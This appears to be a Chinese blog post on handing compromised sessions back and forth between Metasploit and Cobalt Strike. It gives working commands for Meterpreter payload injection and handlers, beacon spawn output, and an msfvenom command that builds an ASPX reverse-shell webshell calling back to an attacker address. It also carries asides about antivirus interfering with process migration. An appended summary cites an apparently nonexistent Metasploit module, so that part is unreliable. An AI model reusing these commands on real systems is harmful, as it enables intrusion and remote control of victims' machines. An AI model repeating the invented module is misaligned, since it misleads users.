MSF与CS之间会话传递,互相派生,版本问题踩坑

查看kali版本:

┌──(root㉿kali)-[~]
└─# msfconsole -V
Framework Version: 6.1.27-dev
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# cat /etc/os-release    
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2022.1"
VERSION_ID="2022.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# 

cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是反过来cs4.5不能派生给msf,

得换cobaltstrike4.0至4.4(2023-10-14测试)的版本,试过cs3.14版,不能派生给msf6.1,版本毕竟隔太远了

2023.10.14测试发现cs4.7也支持(派生给msf6),可能就是我下载cs4.5有问题(Cobalt Strike 4.X全版本启动器):

https://www.cnblogs.com/XuyeZi/p/16505470.htmlicon-default.png?t=N7T8https://www.cnblogs.com/XuyeZi/p/16505470.html

msf派生给cs(cs4.3和cs4.5都可以)(192.168.50.1:80 是cs的windows/beacon_httpreverse_http监听器):

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.1
# cs4.1 ipaddr : 192.168.50.1
set lport 80        
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

cs4.3派生给msf,不管cs4.3的beacon是x64还是x86,派生给msf的exploit/multi/handler都是x86:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
#set autorunscript post/windows/manage/migrate name=services.exe 
# 一迁移就会话超时(安装了360和火绒,即使退出了,也有进程在)
set lhost 192.168.50.130
# kali ipaddr : 192.168.50.130
set lport 6666
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

这个地方显示x86,不知道能搞成x64吗?

beacon> spawn msf
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_http (192.168.50.130:6666)
[+] host called home, sent: 807 bytes
beacon>

### 将Metasploit Framework会话迁移到Cobalt Strike 在渗透测试过程中,有时需要将在Metasploit Framework(MSF)中获得的shell或meterpreter会话转移到Cobalt Strike(CS)以便利用CS更强大的功能集。以下是实现这一目标的方法。 #### 准备工作环境 确保MSF安装路径位于`/usr/share/metasploit-framework`[^1],并更新至最新版本以避免兼容性问题。通过命令`msfconsole -v`查看当前版本,并按照官方指南使用`apt-get update && apt-get install metasploit-framework`来保持软件处于最新状态[^2]。 #### 创建反向连接载荷 为了建立从受害者机器到攻击者控制下的CS服务器之间的通信通道,在Kali Linux上可以借助于`msfvenom`工具生成适合目标系统的payload文件。例如针对ASP.NET应用程序可执行如下操作: ```bash msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f aspx -o shell.aspx ``` 此命令将会创建一个名为`shell.aspx`的webshell用于部署到远程Web应用环境中等待触发[^5]。 #### 配置Cobalt Strike Listener 提前设置好接收来自受感染主机发起连接请求的服务监听器至关重要。假设已知MSF所在IP地址为`10.0.0.200`以及指定端口号`7777`作为回调参数,则可以在CS界面里新建一个类型为`Windows -> foreign -> reverse_tcp` 的listener实例[^4]。 #### 迁移Meterpreter Session 当成功获取了一个有效的Meterpreter session之后就可以考虑将其转移给CS处理了。具体做法是在MSF console内部输入以下指令完成迁移过程: ```ruby use exploit/multi/script/web_delivery set SRVHOST 10.0.0.200 set URIPATH / exploit -j -z sessions -i <session_id> run post/windows/manage/migrate_to_cobalt_strike SESSION=<session_id> CS_HOST=10.0.0.200 CS_PORT=7777 ``` 上述脚本中的`<session_id>`应替换为实际存在的活动Session编号;而`CS_HOST`和`CS_PORT`则对应之前设定好的CS listener的相关信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值